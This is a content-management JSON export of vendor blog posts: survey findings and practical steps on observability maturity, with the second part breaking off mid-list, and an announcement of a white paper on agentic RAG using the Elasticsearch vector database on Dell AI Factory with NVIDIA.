incidents","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csc8ca96efa181d53b"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOne of the most striking findings is around the ability to identify root causes during incidents. Organizations with mature or expert-level observability practices are significantly more effective at pinpointing issues with 78% reporting successful root cause identification. In contrast, only 35% of early-stage organizations can say the same. This dramatic difference represents countless hours of reduced downtime and streamlined incident response.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs04398b8cd10534d0"}}},{"image":{"image":{"uid":"bltd563546cb0053751","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-18T20:55:46.063Z","created_by":"bltb6c155cd84fc0c1a","file_size":"634037","filename":"image4.png","parent_uid":null,"tags":[],"title":"image4.png","updated_at":"2024-11-18T20:55:46.063Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-20T15:00:01.264Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltd563546cb0053751/673ba9d289b5b30337be1e6c/image4.png"},"_metadata":{"uid":"cs484337c33a8baff9"},"caption_l10n":"","alt_text_l10n":"customers report problems","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs2e47a14551fdf711"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003ePerhaps equally telling is the shift from reactive to proactive operations that comes with maturity. Mature organizations are substantially less likely to hear about problems from their users first — only 24% compared to 34% for those in early stages. This reduction in user-reported incidents suggests that mature organizations are catching and addressing issues before they impact the end-user experience.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs904006e6bb47c4ec"}}},{"image":{"image":{"uid":"blt17d23fb8cff0fd11","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-18T20:55:59.883Z","created_by":"bltb6c155cd84fc0c1a","file_size":"693385","filename":"image3.png","parent_uid":null,"tags":[],"title":"image3.png","updated_at":"2024-11-18T20:55:59.883Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-20T15:00:01.343Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt17d23fb8cff0fd11/673ba9df3c3ebb0d36141816/image3.png"},"_metadata":{"uid":"cse29ae395e63ef8c8"},"caption_l10n":"","alt_text_l10n":"harder or easier to manage cloud tech","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csecf96158a21ea423"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe data becomes even more interesting when we look at cloud infrastructure management. In today's increasingly complex cloud-native landscape, 50% of mature and expert teams report finding cloud technologies easier to manage — while only 17% of early-stage teams share this experience. This stark contrast highlights how robust observability practices can help tame the inherent complexity of modern cloud architectures.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Observability maturity results in operational excellence","_metadata":{"uid":"csbb50a26b8cf07c6b"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe statistics tell a clear story: investing in observability maturity translates directly into operational excellence. Organizations are better positioned to maintain reliable services and respond quickly to emerging issues when they can effectively instrument their systems, correlate telemetry data, and establish meaningful alerting thresholds.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThese improvements in observability capability tend to create positive ripple effects throughout an organization. As teams get better at detecting and diagnosing issues, they can spend more time on proactive performance improvements rather than reactive firefighting. This shift often leads to more stable systems, more confident deployments, and better alignment between technical capabilities and business objectives.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhile the journey to observability maturity requires significant investment in tools, processes, and cultural changes, the data suggests that these investments pay clear dividends in operational efficiency and service reliability. Each step forward in maturity brings organizations closer to the goal of truly observable systems that can be effectively monitored, debugged, and improved.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"The benefits to observability maturity are clear ","_metadata":{"uid":"cs0cdb0ebec36b05c0"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe observability maturity spectrum reveals a clear picture: while only 7% of organizations have reached expert status, every team is somewhere along this transformative journey. Whether you're among the 15% that are just beginning or the 43% that are actively improving, you're part of a community working toward better and more observable systems. And you’re already likely seeing the benefits and results.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIn part two of this blog series, we'll explore the roadblocks and solutions at each stage of maturity, offering practical steps to level up your observability maturity. We'll also examine the crucial role leadership plays in driving observability success. Whether you're struggling with tool sprawl, data silos, or cultural resistance, you'll discover battle-tested strategies to overcome these challenges and advance your organization's observability journey. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/observability-maturity-lessons-leadership-part2\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eCheck out part two in this blog series.\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs2780b0365f8fe3b0"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csed7b215f7261386d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csfb6b1d765cf17152"}}}],"publish_date":"2024-11-20","sanity_migration_complete":false,"seo":{"seo_title_l10n":"Level up your observability practice and see measurable benefits","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"Moving to observability maturity","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt8a7a5ea52ac5d888","ACL":{},"created_at":"2020-06-17T03:30:37.843Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"observability","label_l10n":"Observability","tags":[],"title":"Observability","updated_at":"2020-07-06T22:20:06.879Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.411Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt9fd20014934183c7","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-11-18T20:54:56.563Z","created_by":"bltb6c155cd84fc0c1a","file_size":"152620","filename":"white_stairs.jpg","parent_uid":null,"tags":[],"title":"white stairs.jpg","updated_at":"2024-11-18T20:54:56.563Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-20T15:00:01.330Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9fd20014934183c7/673ba9a0f8d4ec6498ce5147/white_stairs.jpg"},"title":"Leveling up your observability practice — Part 1","title_l10n":"Leveling up your observability practice — Part 1 ","updated_at":"2024-11-21T16:16:39.406Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/observability-maturity-lessons-benefits-part1","publish_details":{"time":"2024-11-21T16:16:44.846Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt918cf2788a68bf75","_version":8,"locale":"en-us","ACL":{},"abstract_l10n":"Elastic collaborates with Dell on Agentic RAG on Dell AI Factory with NVIDIA, showcasing a design reference for developers to implement AI-driven data retrieval solutions using the Elasticsearch vector database.","author":["blt9d6e81ff1a69cdfa","blt0b88dde31d129f76"],"category":["blt0c9f31df4f2a7a2b"],"created_at":"2024-11-21T01:52:15.390Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs22528b9535667e9a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003eWe are excited to collaborate with Dell on the white paper,\u003cem\u003eAgentic RAG on Dell AI Factory with NVIDIA\u003c/em\u003e. The white paper is a design reference document for developers outlining strategies and solution components to implement agentic retrieval augmented generation (RAG) applications. It’s a design point for organizations across industries, specifically healthcare, for the agentic RAG framework decision-making with AI-driven data retrieval.\u003c/p\u003e"},{"title_l10n":"What is Dell AI Factory with NVIDIA?","_metadata":{"uid":"cs621f2aeaedae7041"},"header_style":"H2","paragraph_l10n":"\u003cp\u003eThe Dell AI Factory with NVIDIA is a comprehensive, end-to-end AI solution designed to simplify and accelerate AI adoption for businesses across various industries. The catalog offerings are built on a range of Dell's advanced PowerEdge servers and paired with NVIDIA's AI technology to provide everything needed to process, manage, and analyze vast amounts of data. \u003ca href=\"https://www.dell.com/en-us/blog/simplifying-ai-in-the-enterprise/\" target=\"_blank\"\u003eLearn more\u003c/a\u003e.\u003c/p\u003e"},{"title_l10n":"Elasticsearch vector database","_metadata":{"uid":"cs808f67d94ada42fc"},"header_style":"H2","paragraph_l10n":"\u003cp\u003eAs organizations use internal data for context-driven generative AI (GenAI) solutions, working with unstructured and semi-structured data and retrieving relevant information quickly without sacrificing scale remains challenging. The \u003cem\u003eAgentic RAG on Dell AI Factory with NVIDIA\u003c/em\u003e white paper recommends the \u003ca href=\"/elasticsearch/vector-database\"\u003eElasticsearch vector database\u003c/a\u003e for vector data indexing and retrieval at scale.\u003c/p\u003e"}],"_metadata":{"uid":"cs9673b3247483d124"}}},{"image":{"image":{"uid":"blt7c97e2800cd5eb53","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-21T01:34:06.739Z","created_by":"bltb6c155cd84fc0c1a","file_size":"397448","filename":"dell_blog.png","parent_uid":null,"tags":[],"title":"dell blog.png","updated_at":"2024-11-21T01:34:06.739Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-21T14:00:00.675Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt7c97e2800cd5eb53/673e8e0e5ac062570430648c/dell_blog.png"},"_metadata":{"uid":"cse8e9c12ab37c385f"},"caption_l10n":"Agentic RAG stack featuring NVIDIA NIM tooling on Dell AI Factory with Elasticsearch vector database","alt_text_l10n":"agentic rag on dell ai factory with NVIDIA","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csd8af341ee6c4510f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003eElasticsearch is the world’s most downloaded vector database — and we continue to extend our advantage. We recently introduced \u003ca href=\"https://www.elastic.co/search-labs/blog/better-binary-quantization-lucene-elasticsearch\"\u003eBetter Binary Quantization (BBQ)\u003c/a\u003e, which brings significant speed and efficiency benefits for storing large vectorized data sets. Elastic is the only vector database that offers this capability (at the time of publication). BBQ outperforms traditional approaches like Product Quantization (PQ) in indexing speed (20x–30x less quantization time) and query speed (2x–5x faster queries) with no additional loss in accuracy.\u003c/p\u003e"},{"title_l10n":"Simpler, powerful integrations for GenAI developers: Elastic AI Ecosystem","_metadata":{"uid":"cs204f5698c028b1a7"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cem\u003eAgentic RAG on Dell AI Factory with NVIDIA\u003c/em\u003e outlines all the solution components that developers may need to build real-world RAG applications — covering Dell technologies, Elasticsearch vector database, LangChain’s LangGraph, \u003ca href=\"https://www.elastic.co/search-labs/blog/nvidia-nim-with-elasticsearch-vector-store\"\u003eNVIDIA Inference Microservices\u003c/a\u003e, and others. This white paper underscores the value of a well-integrated ecosystem of AI technologies that accelerates customers’ development and deployment of RAG applications.\u003c/p\u003e\u003cp\u003eIn addition to our collaboration with Dell, Elastic worked with LangChain to provide a \u003ca href=\"https://www.elastic.co/search-labs/blog/langchain-langgraph-retrieval-agent-template\"\u003eretrieval agent template\u003c/a\u003e for LangGraph that’s preconfigured for the Elasticsearch vector database. By doing so, we continue our theme of providing developers with simpler, well-integrated generative AI offerings.\u003c/p\u003e\u003cp\u003eHappy AI agenting!\u003c/p\u003e"}],"_metadata":{"uid":"cs291f52f10fbe133f"}}},{"callout":{"title_l10n":"Resources","_metadata":{"uid":"csb089247c498dc4ec"},"paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/run-elasticsearch-locally.html\"\u003estart-local with Elasticsearch vector database\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/search-labs\"\u003eElastic Search Labs\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/search-labs/integrations\"\u003eElasticsearch vector database ecosystem integrations\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://infohub.delltechnologies.com/en-us/t/agentic-rag-on-dell-ai-factory-with-nvidia/\" target=\"_blank\"\u003eAgentic RAG on Dell AI Factory with NVIDIA\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.dell.com/en-us/blog/simplifying-ai-in-the-enterprise/\" target=\"_blank\"\u003eSimplifying AI in the Enterprise: The Dell AI Factory with NVIDIA\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs387c833c0eeafa4b"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs1dcd449a2d9ee0c4"}}}],"publish_date":"2024-11-21","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[{"_version":2,"locale":"en-us","uid":"blt3f3639d673966a36","ACL":{},"created_at":"2020-06-17T03:24:07.151Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"healthcare","label_l10n":"Healthcare","tags":[],"title":"Healthcare","updated_at":"2020-07-06T22:17:41.344Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.540Z","user":"blt4b2e1169881270a8"}}],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltbaad5df00a89fcb2","ACL":{},"created_at":"2023-11-06T20:07:17.254Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-search-applications","label_l10n":"AI search applications","tags":[],"title":"AI search applications","updated_at":"2023-11-06T20:07:17.254Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:43.822Z","user":"blt06083bb707628f5c"}},{"title":"Architecture","label_l10n":"Architecture","keyword":"architecture","hidden_value":true,"tags":[],"locale":"en-us","uid":"blt91896b1dfcbd6413","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:39:38.693Z","updated_at":"2020-06-17T03:39:38.693Z","_content_type_uid":"tags_topic","ACL":{},"_version":1,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:39:38.693Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-06-24T15:31:11.375Z","user":"bltf6ab93733e4e3a73"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt284682f193d93481","ACL":{},"created_at":"2023-11-06T20:07:36.694Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-ml-models","label_l10n":"AI/ML models","tags":[],"title":"AI/ML models","updated_at":"2023-11-06T20:07:36.694Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:37.071Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":1,"locale":"en-us","uid":"bltbc86a233655f4b8e","ACL":{},"created_at":"2022-09-13T16:43:08.111Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2022-09-13T16:43:08.111Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.253Z","user":"blt4b2e1169881270a8"}},{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"bltb10aa42e0969991d","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-21T01:52:13.970Z","created_by":"bltb6c155cd84fc0c1a","file_size":"93244","filename":"AI-assist.png","parent_uid":null,"tags":[],"title":"AI-assist.png","updated_at":"2024-11-21T01:52:13.970Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-21T14:00:00.663Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb10aa42e0969991d/673e924db5054c39e6323aaf/AI-assist.png"},"title":"Agentic RAG on Dell AI Factory with NVIDIA and Elasticsearch vector database","title_l10n":"Agentic RAG on Dell AI Factory with NVIDIA and Elasticsearch vector database","updated_at":"2024-11-21T16:01:04.851Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/agentic-rag-dell-ai-factory-nvidia-elasticsearch-vector-database","publish_details":{"time":"2024-11-21T16:01:10.162Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt818f4fffd650c275","_version":3,"locale":"en-us","ACL":{},"abstract_l10n":"Increasing your observability maturity delivers measurable results if you can work around the challenges and get support from your leadership. Find concrete examples of how you can achieve observability maturity in this thought-provoking blog!","author":["bltd516a87082210f90"],"category":["blte5cc8450a098ce5e"],"created_at":"2024-11-21T02:23:39.868Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs632d77ee701f6789"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn our \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/observability-maturity-lessons-benefits-part1\"\u003e\u003cspan style='font-size: 12pt;'\u003eprevious blog\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, we explored the observability maturity spectrum — revealing that while only 7% of organizations consider themselves experts, the majority (43%) are actively working to improve their practices. We saw how mature organizations achieve better outcomes, from faster root cause analysis to reduced user-reported incidents.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNow, let's tackle the practical side of advancing your observability maturity. We'll explore the common challenges teams face at different stages of their journey, from early-stage hurdles like cross-team collaboration to the scaling challenges that even experts grapple with. You'll discover concrete steps to level up your maturity, including insights on postmortems, service level objectives (SLOs), and emerging technologies like OpenTelemetry (OTel).\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFinally, we'll examine the crucial role leadership plays in driving observability success for an organization and how to effectively advocate for resources and support.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Common challenges at different maturity levels","_metadata":{"uid":"cs1a8c5441913bf526"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs organizations progress in their observability journey, the challenges they face evolve, as seen in the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/resources/observability/white-paper/state-of-observability-practitioner-perspective\"\u003e\u003cspan style='font-size: 12pt;'\u003e2024 State of Observability survey\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs3baaa5a84a4a73a6"}}},{"image":{"image":{"uid":"blt427dd893e9efe693","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-21T02:20:32.308Z","created_by":"bltb6c155cd84fc0c1a","file_size":"582960","filename":"obs.png","parent_uid":null,"tags":[],"title":"obs.png","updated_at":"2024-11-21T02:20:32.308Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-21T15:01:00.279Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt427dd893e9efe693/673e98f043fe4c250d68be61/obs.png"},"_metadata":{"uid":"cs0ca992aec0c69954"},"caption_l10n":"","alt_text_l10n":"observability maturity survey","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs334b7af7c911e833"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eEarly-stage challenges:\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLack of collaboration between teams\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eInsufficient skills and expertise\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHigh levels of toil\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eMature/expert challenges:\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTool scale and performance issues\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eManaging different requirements across teams\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs an SRE, understanding the typical progression of challenges in observability implementations can help you better prepare for and navigate your own journey. While every organization's path is unique, certain patterns emerge as teams move from initial implementation to mastery of their observability practices.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Early-stage observability maturity challenges","_metadata":{"uid":"cs15e8f9fb59016f05"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn the early stages of observability adoption, teams often face challenges that are more organizational than technical in nature. Consider the common scenario where development and operations teams — despite having access to the same observability tools — effectively speak different languages when discussing system health. For example, developers might focus primarily on application-level metrics while operations teams concentrate on infrastructure metrics, creating a disconnect that can significantly impact incident response times and system improvement initiatives.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis collaboration gap represents just one aspect of early-stage challenges. Another significant hurdle is building and maintaining the right expertise across the team. Without adequate knowledge sharing and training, organizations often find themselves dependent on a few key individuals who become bottlenecks for progress. This becomes particularly evident when junior team members struggle with complex tasks like querying distributed traces or correlating metrics across systems.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe prevalence of toil — those repetitive, manual tasks that consume valuable time and resources — presents another significant early-stage challenge. Think about teams spending hours each week manually updating dashboards and alert thresholds across different environments. This not only drains team resources but also introduces the risk of human error into monitoring setups.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Mature/expert observability maturity challenges","_metadata":{"uid":"cs5d4c612b1a9c8ed9"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs observability practices mature, however, the nature of challenges evolves. Teams that have successfully built a strong observability culture often find themselves grappling with scale and performance issues. This might manifest as exponential growth in logging volume that leads to storage concerns and performance bottlenecks, requiring sophisticated sampling strategies and retention policies.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAt the expert level, a common challenge emerges around managing different requirements across various teams within the organization. Imagine trying to create a unified observability framework that can accommodate diverse monitoring needs and compliance requirements while maintaining consistency and efficiency — no small feat, even for experienced teams.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eUnderstanding this progression helps teams better prepare for what lies ahead and avoid the trap of trying to solve tomorrow's problems before addressing today's fundamentals. For those just starting, the focus should be on building strong collaborative practices and investing in team education. More mature teams need to concentrate on technology optimization and standardization while maintaining flexibility to support diverse needs.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Practical steps for advancing observability maturity","_metadata":{"uid":"cs93483c2d8746f040"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSo, how do organizations move from novice to expert? Here are some concrete steps:\u003c/span\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eEmbrace postmortems\u003c/strong\u003e\u003c/span\u003e\u003cstrong\u003e\u003c/strong\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e: \u003c/strong\u003eOnly 8% of early-stage companies regularly run postmortems compared to 45% of mature/expert companies. Make postmortems a standard practice after incidents to drive continuous improvement and minimize toil.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eImplement SLOs\u003c/strong\u003e\u003c/span\u003e\u003cstrong\u003e\u003c/strong\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e:\u003c/strong\u003e 89% of mature/expert companies use SLOs with 48% basing them on golden signals. Start by defining SLOs for your most critical services and basing them on industry standards.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eInvest in skills development\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e:\u003c/strong\u003e Focus on key areas like monitoring and observability, automation and scripting, and performance tuning. These skills were seen as the most critical for SREs in our recent observability practitioner survey.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eAdopt AI and machine learning 